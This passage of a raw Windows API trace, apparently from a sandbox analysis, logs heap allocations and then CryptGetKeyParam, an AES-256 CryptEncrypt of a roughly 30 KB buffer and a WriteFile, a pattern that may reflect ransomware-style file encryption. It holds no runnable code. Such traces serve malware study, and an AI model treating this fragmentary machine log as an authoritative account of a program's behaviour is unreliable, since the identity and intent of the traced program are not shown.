lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0084.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0084.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0084.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0084.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0084.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0084.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0084.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0084.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0084.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0084.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0084.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0084.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0084.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0084.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0084.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0084.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0084.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0084.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0084.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0084.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0084.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0084.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0084.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0084.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0084.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0084.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0084.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0084.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0084.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0084.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0084.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0084.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0084.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0084.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0084.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0084.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0084.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0084.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0084.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0084.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0084.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0084.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0084.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0084.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0084.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0084.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0084.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0084.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0084.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0084.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.531] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0084.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0084.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0084.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0084.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0084.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0084.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0084.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0084.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0084.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0084.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0084.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0084.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0084.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0084.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0084.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0084.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0084.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0084.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0084.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0084.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0084.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0084.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0084.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0084.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0084.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0084.533] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0084.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0084.534] CryptGetKeyParam (in: hKey=0x41ac500, dwParam=0x7, pbData=0x43e2850, pdwDataLen=0x144ddb0, dwFlags=0x0 | out: pbData=0x43e2850*=0x6610, pdwDataLen=0x144ddb0*=0x4) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0084.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0084.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0084.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0084.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0084.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0084.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0084.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0084.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0084.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0084.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0084.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0084.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0084.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0084.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0084.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0084.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0084.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0084.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0084.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0084.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0084.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0084.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0084.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0084.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0084.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0084.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0084.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0084.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0084.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0084.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0084.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0084.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0084.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0084.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0084.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0084.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0084.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0084.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0084.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0084.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0084.537] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0084.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0084.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0084.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0084.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0084.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0084.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0084.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0084.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.538] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0084.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0084.538] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0084.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0084.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0084.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0084.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0084.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0084.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0084.541] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0084.541] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0084.541] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0084.541] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.541] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0084.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0084.542] CryptEncrypt (in: hKey=0x41ac500, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e2e0*=0x74e6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e2e0*=0x74f0) returned 1 [0084.542] CharLowerBuffW (in: lpsz="byte[29937]", cchLength=0xb | out: lpsz="byte[29937]") returned 0xb [0084.542] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.542] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0084.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb210, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0084.542] CryptEncrypt (in: hKey=0x41ac500, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b1500*, pdwDataLen=0x144e2e0*=0x74e6, dwBufLen=0x74f0 | out: pbData=0x49b1500*, pdwDataLen=0x144e2e0*=0x74f0) returned 1 [0084.542] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0084.542] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0084.542] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0084.542] WriteFile (in: hFile=0x258, lpBuffer=0x44048b0*, nNumberOfBytesToWrite=0x74f0, lpNumberOfBytesWritten=0x144ece4, lpOverlapped=0x0 | out: lpBuffer=0x44048b0*, lpNumberOfBytesWritten=0x144ece4*=0x74f0, lpOverlapped=0x0) returned 1 [0084.614] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0084.614] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.614] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0084.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cacd0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 